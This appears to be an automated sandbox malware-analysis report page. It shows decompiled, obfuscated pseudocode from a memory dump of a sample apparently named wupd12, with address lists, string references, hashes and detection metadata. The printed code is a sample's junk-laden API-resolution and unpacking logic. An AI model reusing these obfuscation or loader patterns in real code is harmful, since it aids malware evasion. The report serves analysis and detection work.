																																																																																										 *(__ebx + 0x499050) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																										__ecx = __ecx;
																																																																																										__eax = __eax;
																																																																																										__eflags =  *(__ebx + 0x4990ac);
																																																																																										if( *(__ebx + 0x4990ac) != 0) {
																																																																																											goto L1;
																																																																																										} else {
																																																																																											 *(__ebx + 0x4990ac) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																											__edx = __edx;
																																																																																											__eflags =  *(__ebx + 0x4990c0);
																																																																																											if( *(__ebx + 0x4990c0) != 0) {
																																																																																												goto L1;
																																																																																											} else {
																																																																																												__eax =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																												 *(__ebx + 0x4990c0) = __eax;
																																																																																												__edx = __edx;
																																																																																												__ecx = __ecx;
																																																																																												__eflags =  *(__ebx + 0x4990f8);
																																																																																												if( *(__ebx + 0x4990f8) != 0) {
																																																																																													goto L1;
																																																																																												} else {
																																																																																													 *(__ebx + 0x4990f8) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																													__eax = __eax;
																																																																																													__eflags =  *(__ebx + 0x49915c);
																																																																																													if( *(__ebx + 0x49915c) != 0) {
																																																																																														goto L1;
																																																																																													} else {
																																																																																														 *(__ebx + 0x49915c) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																														__edx = __edx;
																																																																																														__ecx = __ecx;
																																																																																														__eflags =  *(__ebx + 0x4990b4);
																																																																																														if( *(__ebx + 0x4990b4) != 0) {
																																																																																															goto L1;
																																																																																														} else {
																																																																																															 *(__ebx + 0x4990b4) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																															__eflags =  *(__ebx + 0x499004);
																																																																																															if( *(__ebx + 0x499004) != 0) {
																																																																																																goto L1;
																																																																																															} else {
																																																																																																 *(__ebx + 0x499004) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																																__eflags =  *(__ebx + 0x4990b8);
																																																																																																if( *(__ebx + 0x4990b8) != 0) {
																																																																																																	goto L1;
																																																																																																} else {
																																																																																																	__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																																	 *(__ebx + 0x4990b8) = __eax;
																																																																																																	__ecx = __ecx;
																																																																																																	__eflags =  *(__ebx + 0x49904c);
																																																																																																	if( *(__ebx + 0x49904c) != 0) {
																																																																																																		goto L1;
																																																																																																	} else {
																																																																																																		 *(__ebx + 0x49904c) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																																		__eax = __eax;
																																																																																																		__eflags =  *(__ebx + 0x49916c);
																																																																																																		if( *(__ebx + 0x49916c) != 0) {
																																																																																																			goto L1;
																																																																																																		} else {
																																																																																																			 *(__ebx + 0x49916c) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																																			__eflags =  *(__ebx + 0x499008);
																																																																																																			if( *(__ebx + 0x499008) != 0) {
																																																																																																				goto L1;
																																																																																																			} else {
																																																																																																				 *(__ebx + 0x499008) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																																				__eflags =  *(__ebx + 0x4990e4);
																																																																																																				if( *(__ebx + 0x4990e4) != 0) {
																																																																																																					goto L1;
																																																																																																				} else {
																																																																																																					 *(__ebx + 0x4990e4) =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																																					__edx = __edx;
																																																																																																					__ecx = __ecx;
																																																																																																					__eflags =  *(__ebx + 0x499148);
																																																																																																					if( *(__ebx + 0x499148) != 0) {
																																																																																																						goto L1;
																																																																																																					} else {
																																																																																																						 *(__ebx + 0x499148) =  *((intOrPtr*)(__ebx + 0x49940c))();
																																																																																																						__eflags =  *(__ebx + 0x499110);
																																																																																																						if( *(__ebx + 0x499110) != 0) {
																																																																																																							goto L1;
																																																																																																						} else {
																																																																																																							__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																																							 *(__ebx + 0x499110) = __eax;
																																																																																																							__eflags =  *(__ebx + 0x499000);
																																																																																																							if(__eflags == 0) {
																																																																																																								__eax =  *((intOrPtr*)(__ebx + 0x499424))();
																																																																																																								 *(__ebx + 0x499000) = __eax;
																																																																																																								__ecx = __ecx;
																																																																																																							}
																																																																																																							__ebp = __esp;
																																																																																																							__esp = __esp + 0xfffffff8;
																																																																																																							__eax = __eax & 0x0000a645;
																																																																																																							_a4 = _a4 - 0xc604;
																																																																																																							__eax = E004C5A40(__eax, __ebx, __eflags,  *(__ebx + 0x499014),  *(__ebx + 0x499010),  *(__ebx + 0x49900c));
																																																																																																							 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) - 0x615c;
																																																																																																							__eax = __eax - 1;
																																																																																																							_v12 = _v12 ^ 0x00000000;
																																																																																																							__edx = __edx + 1;
																																																																																																							 *(__ebx + 0x4031d8) =  *(__ebx + 0x4031d8) & __esi;
																																																																																																							_a8 = _a8 + 1;
																																																																																																							__eax = __eax - 0x2f7d;
																																																																																																							_a4 = 0xa64d;
																																																																																																							_v12 = _v12 ^ 0x00007bf7;
																																																																																																							__edi = __edi | 0x00000019;
																																																																																																							_a4 = _a4 + 0xe517;
																																																																																																							__eax = __eax ^ 0x00000000;
																																																																																																							 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) ^ 0x00003367;
																																																																																																							__eax = E004C1000(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x403550)),  *((intOrPtr*)(__ebx + 0x40354c)),  *((intOrPtr*)(__ebx + 0x403548)));
																																																																																																							 *(__ebx + 0x4031dc) = 0x5db5;
																																																																																																							__eax = __eax + 0x9779;
																																																																																																							__esi = __esi - 1;
																																																																																																							_v8 = _v8 + 0x2806;
																																																																																																							__edx = __edx |  *(__ebx + 0x4031d8);
																																																																																																							__eax = E004C7C0E(__eax, __ebx, __eflags,  *(__ebx + 0x499018));
																																																																																																							__eax = E004C3597(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x40355c)), __eax,  *((intOrPtr*)(__ebx + 0x403558)));
																																																																																																							 *(__ebx + 0x4031d8) =  *(__ebx + 0x4031d8) | __ecx;
																																																																																																							__ecx = __ecx -  *(__ebx + 0x4031d8);
																																																																																																							__eax = __eax + 0x9b60;
																																																																																																							__eax = __eax + 0xe686;
																																																																																																							_v8 = _v8 - __edx;
																																																																																																							_v8 = 0x538;
																																																																																																							 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) ^ 0x0000f167;
																																																																																																							_v12 = _v12 & 0x000051d2;
																																																																																																							__eax = E004C1F4C(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x499034)),  *(__ebx + 0x499030));
																																																																																																							__eflags = __edx & __ecx;
																																																																																																							__eax = E004C16EF(__eax, __ebx,  *(__ebx + 0x499040),  *(__ebx + 0x49903c),  *(__ebx + 0x499038));
																																																																																																							_v12 & 0x000083ec = _a4 & 0x000009e7;
																																																																																																							__edi = __edi ^ 0x00000000;
																																																																																																							__eax = E004C822A(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x403580)),  *((intOrPtr*)(__ebx + 0x40357c)));
																																																																																																							_a8 = _a8 | 0x000013ff;
																																																																																																							_a8 = _a8 + 1;
																																																																																																							__eax = E004C3597(__eax, __ebx,  *(__ebx + 0x499008),  *(__ebx + 0x499004),  *(__ebx + 0x499000));
																																																																																																							_v12 = _v12 ^ __edx;
																																																																																																							_v12 = _v12 & __ecx;
																																																																																																							__eax = E004C6853(__eax, __ebx, __eflags,  *(__ebx + 0x49904c),  *(__ebx + 0x499048),  *(__ebx + 0x499044));
																																																																																																							__eax = E004CC4D5(__eax, __ebx,  *(__ebx + 0x499020),  *(__ebx + 0x49901c));
																																																																																																							__eax = E004C5A40(__eax, __ebx, __eflags,  *((intOrPtr*)(__ebx + 0x403570)),  *((intOrPtr*)(__ebx + 0x40356c)),  *((intOrPtr*)(__ebx + 0x403568)));
																																																																																																							_a4 = _a4 & 0x00006af5;
																																																																																																							_a4 = _a4 - __esi;
																																																																																																							 *(__ebx + 0x4031dc) = 0xcfbc;
																																																																																																							 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) + 1;
																																																																																																							__eax = __eax & 0x0000bb2b;
																																																																																																							__eax = E004C6139(__eax, __ebx, __eflags,  *((intOrPtr*)(__ebx + 0x403578)),  *((intOrPtr*)(__ebx + 0x403574)));
																																																																																																							 *(__ebx + 0x4031d8) & 0x00002286 =  *(__ebx + 0x4031d8) & 0x0000325f;
																																																																																																							__eax = __eax ^ 0x000064e2;
																																																																																																							__eax = __eax + __ecx;
																																																																																																							__eax = __eax ^ 0x00000000;
																																																																																																							__ecx = __ecx + 1;
																																																																																																							__eax = E004CD078(__eax, __ebx,  *(__ebx + 0x49902c),  *(__ebx + 0x499028),  *(__ebx + 0x499024));
																																																																																																							__ecx = __eax;
																																																																																																							_v12 = __edx;
																																																																																																							__eax = E004C2607(__eax, __ebx, __eflags,  *((intOrPtr*)(__ebx + 0x403564)),  *((intOrPtr*)(__ebx + 0x403560)));
																																																																																																							_v12 = _v12 | __ecx;
																																																																																																							 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) + 0x37bb;
																																																																																																							__eax = __eax - 0x3734;
																																																																																																							__eflags = _v12 & __eax;
																																																																																																							__eax = __eax ^ 0x0000dbce;
																																																																																																							__edi = __edi ^ 0x00000000;
																																																																																																							_v8 = _v8 - __edi;
																																																																																																							__eax = E004C43F0(__eax, __ebx, __eflags,  *((intOrPtr*)(__ebx + 0x403590)),  *((intOrPtr*)(__ebx + 0x40358c)),  *((intOrPtr*)(__ebx + 0x403588)));
																																																																																																							__edx = __edx ^ _v8;
																																																																																																							__edi = __edi | __ecx;
																																																																																																							_v12 = _v12 & __ecx;
																																																																																																							__eax = __eax & 0x00009af5;
																																																																																																							__eax = E004CCD0E(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x403554)));
																																																																																																							__eflags =  *(__ebx + 0x4031d8) & 0x000061ad;
																																																																																																							_v8 = _v8 + 0x793e;
																																																																																																							__eflags = _v12 & 0x0000a066;
																																																																																																							_v8 = _v8 ^ __edi;
																																																																																																							__esi = 0;
																																																																																																							 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) + __edx;
																																																																																																							 *(__ebx + 0x4031d8) = 0x1d69;
																																																																																																							__edi = __edi + 0x8694;
																																																																																																							 *(__ebx + 0x4031d8) =  *(__ebx + 0x4031d8) - 1;
																																																																																																							__edx = __edx - 0x1441;
																																																																																																							_v12 = _v12 | __eax;
																																																																																																							__eax = E004CD770(__eax, __ebx,  *((intOrPtr*)(__ebx + 0x403584)));
																																																																																																							_a4 = 0;
																																																																																																							__esi =  *(__ebx + 0x4031d8);
																																																																																																							_a8 = _a8 + 1;
																																																																																																							__eax = __eax + 0x511f;
																																																																																																							_a4 = _a4 | __ecx;
																																																																																																							__eflags = __edx;
																																																																																																							__edi = __edi;
																																																																																																							__esi = __esi;
																																																																																																							__edx = __edx;
																																																																																																							__ecx = __ecx;
																																																																																																							__eax = __eax;
																																																																																																							__esp = __ebp;
																																																																																																							__ebp = __ebp;
																																																																																																							return __eax;
																																																																																																						}
																																																																																																					}
																																																																																																				}
																																																																																																			}
																																																																																																		}
																																																																																																	}
																																																																																																}
																																																																																															}
																																																																																														}
																																																																																													}
																																																																																												}
																																																																																											}
																																																																																										}
																																																																																									}
																																																																																								}
																																																																																							}
																																																																																						}
																																																																																					}
																																																																																				}
																																																																																			}
																																																																																		}
																																																																																	}
																																																																																}
																																																																															}
																																																																														}
																																																																													}
																																																																												}
																																																																											}
																																																																										}
																																																																									}
																																																																								}
																																																																							}
																																																																						}
																																																																					}
																																																																				}
																																																																			}
																																																																		}
																																																																	}
																																																																}
																																																															}
																																																														}
																																																													}
																																																												}
																																																											}
																																																										}
																																																									}
																																																								}
																																																							}
																																																						}
																																																					}
																																																				}
																																																			}
																																																		}
																																																	}
																																																}
																																															}
																																														}
																																													}
																																												}
																																											}
																																										}
																																									}
																																								}
																																							}
																																						}
																																					}
																																				}
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x004ca989
0x004ca989
0x004ca98a
0x004ca98c
0x004c8b53
0x004c8b59
0x004c8b5a
0x004c8b5e
0x004c8b6b
0x004c8b6f
0x004c8b75
0x004c8b77
0x004c8b77
0x004c8b79
0x004c8b7e
0x004c8b83
0x004c8b83
0x004c8b86
0x004c8b89
0x004c8b89
0x004c8b93
0x004c8b95
0x004ca992
0x004ca999
0x004ca99f
0x004ca9a0
0x004ca9a7
0x00000000
0x004ca9ad
0x004ca9b4
0x004ca9ba
0x004ca9bb
0x004ca9c2
0x00000000
0x004ca9c8
0x004ca9ce
0x004ca9d4
0x004ca9db
0x00000000
0x004ca9e1
0x004ca9e2
0x004ca9e8
0x004ca9ee
0x004ca9ef
0x004ca9f6
0x00000000
0x004ca9fc
0x004caa03
0x004caa09
0x004caa0a
0x004caa11
0x00000000
0x004caa17
0x004caa1e
0x004caa24
0x004caa25
0x004caa2c
0x00000000
0x004caa32
0x004caa39
0x004caa3f
0x004caa40
0x004caa47
0x00000000
0x004caa4d
0x004caa54
0x004caa5a
0x004caa5b
0x004caa62
0x00000000
0x004caa68
0x004caa68
0x004caa6e
0x004caa74
0x004caa7b
0x00000000
0x004caa81
0x004caa88
0x004caa8e
0x004caa8f
0x004caa96
0x00000000
0x004caa9c
0x004caaa2
0x004caaa8
0x004caaaf
0x00000000
0x004caab5
0x004caab5
0x004caabb
0x004caac1
0x004caac8
0x00000000
0x004caace
0x004caad5
0x004caadb
0x004caadc
0x004caae3
0x00000000
0x004caae9
0x004caaef
0x004caaf5
0x004caafc
0x00000000
0x004cab02
0x004cab02
0x004cab08
0x004cab0e
0x004cab15
0x00000000
0x004cab1b
0x004cab23
0x004cab29
0x004cab2a
0x004cab2b
0x004cab32
0x00000000
0x004cab38
0x004cab3f
0x004cab45
0x004cab46
0x004cab4d
0x00000000
0x004cab53
0x004cab5a
0x004cab60
0x004cab61
0x004cab68
0x00000000
0x004cab6e
0x004cab75
0x004cab7b
0x004cab7c
0x004cab83
0x00000000
0x004cab89
0x004cab8f
0x004cab95
0x004cab9c
0x00000000
0x004caba2
0x004caba3
0x004caba9
0x004cabaf
0x004cabb0
0x004cabb7
0x00000000
0x004cabbd
0x004cabc4
0x004cabca
0x004cabcb
0x004cabd2
0x00000000
0x004cabd8
0x004cabd8
0x004cabde
0x004cabe4
0x004cabeb
0x00000000
0x004cabf1
0x004cabf8
0x004cabfe
0x004cabff
0x004cac06
0x00000000
0x004cac0c
0x004cac14
0x004cac1a
0x004cac1b
0x004cac1c
0x004cac23
0x00000000
0x004cac29
0x004cac31
0x004cac37
0x004cac38
0x004cac39
0x004cac40
0x00000000
0x004cac46
0x004cac46
0x004cac4c
0x004cac52
0x004cac59
0x00000000
0x004cac5f
0x004cac67
0x004cac6d
0x004cac6e
0x004cac6f
0x004cac76
0x00000000
0x004cac7c
0x004cac7c
0x004cac82
0x004cac88
0x004cac8f
0x00000000
0x004cac95
0x004cac9d
0x004caca3
0x004caca4
0x004caca5
0x004cacac
0x00000000
0x004cacb2
0x004cacba
0x004cacc0
0x004cacc1
0x004cacc2
0x004cacc9
0x00000000
0x004caccf
0x004cacd5
0x004cacdb
0x004cace2
0x00000000
0x004cace8
0x004cacee
0x004cacf4
0x004cacfb
0x00000000
0x004cad01
0x004cad01
0x004cad07
0x004cad0d
0x004cad14
0x00000000
0x004cad1a
0x004cad23
0x004cad29
0x004cad2a
0x004cad2b
0x004cad2c
0x004cad33
0x00000000
0x004cad39
0x004cad42
0x004cad48
0x004cad49
0x004cad4a
0x004cad4b
0x004cad52
0x00000000
0x004cad58
0x004cad61
0x004cad67
0x004cad68
0x004cad69
0x004cad6a
0x004cad71
0x00000000
0x004cad77
0x004cad7e
0x004cad84
0x004cad85
0x004cad8c
0x00000000
0x004cad92
0x004cad98
0x004cad9e
0x004cada5
0x00000000
0x004cadab
0x004cadab
0x004cadb1
0x004cadb7
0x004cadbe
0x00000000
0x004cadc4
0x004cadcd
0x004cadd3
0x004cadd4
0x004cadd5
0x004cadd6
0x004caddd
0x00000000
0x004cade3
0x004cadec
0x004cadf2
0x004cadf3
0x004cadf4
0x004cadf5
0x004cadfc
0x00000000
0x004cae02
0x004cae09
0x004cae0f
0x004cae10
0x004cae17
0x00000000
0x004cae1d
0x004cae23
0x004cae29
0x004cae30
0x00000000
0x004cae36
0x004cae36
0x004cae3c
0x004cae42
0x004cae49
0x00000000
0x004cae4f
0x004cae58
0x004cae5e
0x004cae5f
0x004cae60
0x004cae61
0x004cae68
0x00000000
0x004cae6e
0x004cae77
0x004cae7d
0x004cae7e
0x004cae7f
0x004cae80
0x004cae87
0x00000000
0x004cae8d
0x004cae94
0x004cae9a
0x004cae9b
0x004caea2
0x00000000
0x004caea8
0x004caeae
0x004caeb4
0x004caebb
0x00000000
0x004caec1
0x004caec1
0x004caec7
0x004caecd
0x004caed4
0x00000000
0x004caeda
0x004caee3
0x004caee9
0x004caeea
0x004caeeb
0x004caeec
0x004caef3
0x00000000
0x004caef9
0x004caf02
0x004caf08
0x004caf09
0x004caf0a
0x004caf0b
0x004caf12
0x00000000
0x004caf18
0x004caf1e
0x004caf24
0x004caf2b
0x00000000
0x004caf31
0x004caf37
0x004caf3d
0x004caf44
0x00000000
0x004caf4a
0x004caf50
0x004caf56
0x004caf5d
0x00000000
0x004caf63
0x004caf63
0x004caf69
0x004caf6f
0x004caf76
0x00000000
0x004caf7c
0x004caf84
0x004caf8a
0x004caf8b
0x004caf8c
0x004caf93
0x00000000
0x004caf99
0x004caf9f
0x004cafa5
0x004cafac
0x00000000
0x004cafb2
0x004cafb2
0x004cafb8
0x004cafbe
0x004cafc5
0x00000000
0x004cafcb
0x004cafd2
0x004cafd8
0x004cafd9
0x004cafe0
0x00000000
0x004cafe6
0x004cafed
0x004caff3
0x004caff4
0x004caffb
0x00000000
0x004cb001
0x004cb007
0x004cb00d
0x004cb014
0x00000000
0x004cb01a
0x004cb020
0x004cb026
0x004cb02d
0x00000000
0x004cb033
0x004cb039
0x004cb03f
0x004cb046
0x00000000
0x004cb04c
0x004cb052
0x004cb058
0x004cb05f
0x00000000
0x004cb065
0x004cb065
0x004cb06b
0x004cb071
0x004cb078
0x00000000
0x004cb07e
0x004cb086
0x004cb08c
0x004cb08d
0x004cb08e
0x004cb095
0x00000000
0x004cb09b
0x004cb0a1
0x004cb0a7
0x004cb0ae
0x00000000
0x004cb0b4
0x004cb0ba
0x004cb0c0
0x004cb0c7
0x00000000
0x004cb0cd
0x004cb0d4
0x004cb0da
0x004cb0db
0x004cb0e2
0x00000000
0x004cb0e8
0x004cb0ee
0x004cb0f4
0x004cb0fb
0x00000000
0x004cb101
0x004cb107
0x004cb10d
0x004cb114
0x00000000
0x004cb11a
0x004cb11a
0x004cb120
0x004cb126
0x004cb12d
0x00000000
0x004cb133
0x004cb13b
0x004cb141
0x004cb142
0x004cb143
0x004cb14a
0x00000000
0x004cb150
0x004cb157
0x004cb15d
0x004cb15e
0x004cb165
0x00000000
0x004cb16b
0x004cb171
0x004cb177
0x004cb17e
0x00000000
0x004cb184
0x004cb18a
0x004cb190
0x004cb197
0x00000000
0x004cb19d
0x004cb1a3
0x004cb1a9
0x004cb1b0
0x00000000
0x004cb1b6
0x004cb1b6
0x004cb1bc
0x004cb1c2
0x004cb1c9
0x00000000
0x004cb1cf
0x004cb1d7
0x004cb1dd
0x004cb1de
0x004cb1df
0x004cb1e6
0x00000000
0x004cb1ec
0x004cb1f3
0x004cb1f9
0x004cb1fa
0x004cb201
0x00000000
0x004cb207
0x004cb20d
0x004cb213
0x004cb21a
0x00000000
0x004cb220
0x004cb226
0x004cb22c
0x004cb233
0x00000000
0x004cb239
0x004cb23f
0x004cb245
0x004cb24c
0x00000000
0x004cb252
0x004cb252
0x004cb258
0x004cb25e
0x004cb265
0x00000000
0x004cb26b
0x004cb273
0x004cb279
0x004cb27a
0x004cb27b
0x004cb282
0x00000000
0x004cb288
0x004cb28f
0x004cb295
0x004cb296
0x004cb29d
0x00000000
0x004cb2a3
0x004cb2a5
0x004cb2ab
0x004cb2b1
0x004cb2b2
0x004cb2b3
0x004cb2ba
0x00000000
0x004cb2c0
0x004cb2c7
0x004cb2cd
0x004cb2ce
0x004cb2d5
0x00000000
0x004cb2db
0x004cb2e3
0x004cb2e9
0x004cb2ea
0x004cb2eb
0x004cb2f2
0x00000000
0x004cb2f8
0x004cb2fe
0x004cb304
0x004cb30b
0x00000000
0x004cb311
0x004cb317
0x004cb31d
0x004cb324
0x00000000
0x004cb32a
0x004cb32b
0x004cb331
0x004cb337
0x004cb338
0x004cb33f
0x00000000
0x004cb345
0x004cb34c
0x004cb352
0x004cb353
0x004cb35a
0x00000000
0x004cb360
0x004cb366
0x004cb36c
0x004cb373
0x00000000
0x004cb379
0x004cb37f
0x004cb385
0x004cb38c
0x00000000
0x004cb392
0x004cb39a
0x004cb3a0
0x004cb3a1
0x004cb3a2
0x004cb3a9
0x00000000
0x004cb3af
0x004cb3b5
0x004cb3bb
0x004cb3c2
0x00000000
0x004cb3c8
0x004cb3c8
0x004cb3ce
0x004cb3d4
0x004cb3db
0x004cb3de
0x004cb3e4
0x004cb3ea
0x004cb3ea
0x004cb3ec
0x004cb3ee
0x004cb3f6
0x004cb3fb
0x004cb414
0x004cb419
0x004cb423
0x004cb424
0x004cb428
0x004cb429
0x004cb42f
0x004cb432
0x004cb437
0x004cb43e
0x004cb445
0x004cb448
0x004cb44f
0x004cb454
0x004cb470
0x004cb475
0x004cb47f
0x004cb484
0x004cb485
0x004cb48c
0x004cb4a5
0x004cb4aa
0x004cb4af
0x004cb4b5
0x004cb4bb
0x004cb4c0
0x004cb4c5
0x004cb4c8
0x004cb4cf
0x004cb4d9
0x004cb4ec
0x004cb4f1
0x004cb505
0x004cb511
0x004cb518
0x004cb527
0x004cb52c
0x004cb533
0x004cb548
0x004cb54d
0x004cb550
0x004cb583
0x004cb588
0x004cb58d
0x004cb592
0x004cb599
0x004cb59c
0x004cb5a6
0x004cb5ac
0x004cb5bd
0x004cb5cc
0x004cb5d6
0x004cb5db
0x004cb5dd
0x004cb5e2
0x004cb5f5
0x004cb5fa
0x004cb5fc
0x004cb60b
0x004cb614
0x004cb617
0x004cb621
0x004cb626
0x004cb629
0x004cb62f
0x004cb632
0x004cb647
0x004cb64c
0x004cb64f
0x004cb651
0x004cb654
0x004cb65f
0x004cb664
0x004cb66e
0x004cb675
0x004cb67c
0x004cb67f
0x004cb684
0x004cb68e
0x004cb698
0x004cb69e
0x004cb6a4
0x004cb6aa
0x004cb6b3
0x004cb6be
0x004cb6c1
0x004cb6c7
0x004cb6ca
0x004cb6d0
0x004cb6d3
0x004cb6d6
0x004cb6d7
0x004cb6d8
0x004cb6d9
0x004cb6da
0x004cb6db
0x004cb6db
0x004cb6dc
0x004cb6dc
0x004cb3c2
0x004cb3a9
0x004cb38c
0x004cb373
0x004cb35a
0x004cb33f
0x004cb324
0x004cb30b
0x004cb2f2
0x004cb2d5
0x004cb2ba
0x004cb29d
0x004cb282
0x004cb265
0x004cb24c
0x004cb233
0x004cb21a
0x004cb201
0x004cb1e6
0x004cb1c9
0x004cb1b0
0x004cb197
0x004cb17e
0x004cb165
0x004cb14a
0x004cb12d
0x004cb114
0x004cb0fb
0x004cb0e2
0x004cb0c7
0x004cb0ae
0x004cb095
0x004cb078
0x004cb05f
0x004cb046
0x004cb02d
0x004cb014
0x004caffb
0x004cafe0
0x004cafc5
0x004cafac
0x004caf93
0x004caf76
0x004caf5d
0x004caf44
0x004caf2b
0x004caf12
0x004caef3
0x004caed4
0x004caebb
0x004caea2
0x004cae87
0x004cae68
0x004cae49
0x004cae30
0x004cae17
0x004cadfc
0x004caddd
0x004cadbe
0x004cada5
0x004cad8c
0x004cad71
0x004cad52
0x004cad33
0x004cad14
0x004cacfb
0x004cace2
0x004cacc9
0x004cacac
0x004cac8f
0x004cac76
0x004cac59
0x004cac40
0x004cac23
0x004cac06
0x004cabeb
0x004cabd2
0x004cabb7
0x004cab9c
0x004cab83
0x004cab68
0x004cab4d
0x004cab32
0x004cab15
0x004caafc
0x004caae3
0x004caac8
0x004caaaf
0x004caa96
0x004caa7b
0x004caa62
0x004caa47
0x004caa2c
0x004caa11
0x004ca9f6
0x004ca9db
0x004ca9c2
0x004ca9a7

Strings

g3, xrefs: 004CB454
>y, xrefs: 004CB66E
_2, xrefs: 004CB5CC

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: >y$_2$g3
API String ID: 0-1524717188
Opcode ID: 5690b170a2b9edcb33e18c4996012f2610e61ca7adb2d26fb97b48babc0c35ef
Instruction ID: 77f7546c6626de4c5956c4d7c7785852a20d9ff5d06091270f0d5886b9afe043
Opcode Fuzzy Hash: 5690b170a2b9edcb33e18c4996012f2610e61ca7adb2d26fb97b48babc0c35ef
Instruction Fuzzy Hash: 7E72E6B5804205DEFF049F68D489B153BA4FF19316F1884BEEC198E24AE7391D69CA38

Uniqueness

Uniqueness Score: 100.00%

Function 004DBBCE, Relevance: 4.0, Strings: 2, Instructions: 1494UNIQUE

Download Yara Rule

Strings

Q, xrefs: 004DBC0A
, xrefs: 004DBEF2

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: $Q
API String ID: 0-713563958
Opcode ID: a4fcb917bf500e393f8537cbbfa17dbe6106bbd101e27e1edf1c81bbcbb7c361
Instruction ID: c2c153c16c429ab9f8848378284fcfdccb25fad46193f59d1c0c3c4cad13c21e
Opcode Fuzzy Hash: a4fcb917bf500e393f8537cbbfa17dbe6106bbd101e27e1edf1c81bbcbb7c361
Instruction Fuzzy Hash: BBD2229644E3C21FE3138B745CB9A91BFB4AE17218B0E46DBC5C1CF0E3E648584AD766

Uniqueness

Uniqueness Score: 100.00%

Function 004CB3EB, Relevance: 3.9, Strings: 3, Instructions: 152
UNIQUECrypto

Download Yara Rule

C-Code - Quality: 100%

			E004CB3EB(signed int __eax, void* __ebx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				void* _t145;
				void* _t149;
				void* _t152;
				void* _t157;
				void* _t158;
				signed int _t161;
				void* _t168;
				signed int _t171;
				signed int _t173;
				void* _t174;
				signed int _t177;
				signed int _t180;
				void* _t181;
				signed int _t183;
				signed int _t187;
				signed int _t190;
				signed int _t193;

				_t197 = __eflags;
				_a4 = _a4 - 0xc604;
				_t145 = E004C5A40(__eax & 0x0000a645, __ebx, __eflags,  *((intOrPtr*)(__ebx + 0x499014)),  *((intOrPtr*)(__ebx + 0x499010)),  *((intOrPtr*)(__ebx + 0x49900c)));
				 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) - 0x615c;
				_v12 = _v12 ^ 0x00000000;
				 *(__ebx + 0x4031d8) =  *(__ebx + 0x4031d8) & _t193;
				_a8 = _a8 + 1;
				_a4 = 0xa64d;
				_v12 = _v12 ^ 0x00007bf7;
				_a4 = _a4 + 0xe517;
				 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) ^ 0x00003367;
				_t149 = E004C1000(_t145 - 0xffffffffffffd084 ^ 0x00000000, __ebx,  *((intOrPtr*)(__ebx + 0x403550)),  *((intOrPtr*)(__ebx + 0x40354c)),  *((intOrPtr*)(__ebx + 0x403548)));
				 *(__ebx + 0x4031dc) = 0x5db5;
				_v8 = _v8 + 0x2806;
				_t183 = _t181 + 0x00000001 |  *(__ebx + 0x4031d8);
				_t152 = E004C3597(E004C7C0E(_t149 + 0x9779, __ebx, _t197,  *((intOrPtr*)(__ebx + 0x499018))), __ebx,  *((intOrPtr*)(__ebx + 0x40355c)), _t149 + 0x9779,  *((intOrPtr*)(__ebx + 0x403558)));
				 *(__ebx + 0x4031d8) =  *(__ebx + 0x4031d8) | _t177;
				_v8 = _v8 - _t183;
				_v8 = 0x538;
				 *(__ebx + 0x4031dc) =  *(__ebx + 0x4031dc) ^ 0x0000f167;
				_v12 = _v12 & 0x000051d2;
				_t157 = E004C822A(E004C16EF(E004C1F4C(_t152 + 0x181e6, __ebx,  *((intOrPtr*)(__ebx + 0x499034)),  *((intOrPtr*)(__ebx + 0x499030))), __ebx,  *((intOrPtr*)(__ebx + 0x499040)),  *((intOrPtr*)(__ebx + 0x49903c)),  *((intOrPtr*)(__ebx + 0x499038))), __ebx,  *((intOrPtr*)(__ebx + 0x403580)),  *((intOrPtr*)(__ebx + 0x40357c)));
				_a8 = _a8 | 0x000013ff;
				_a8 = _a8 + 1;
				_t158 = E004C3597(_t157, __ebx,  *((intOrPtr*)(__ebx + 0x499008)),  *((intOrPtr*)(__ebx + 0x499004)),  *((intOrPtr*)(__ebx + 0x499000)));
				_v12 = _v12 ^ _t183;
				_v12 = _v12 & _t177 -  *(__ebx + 0x4031d8);
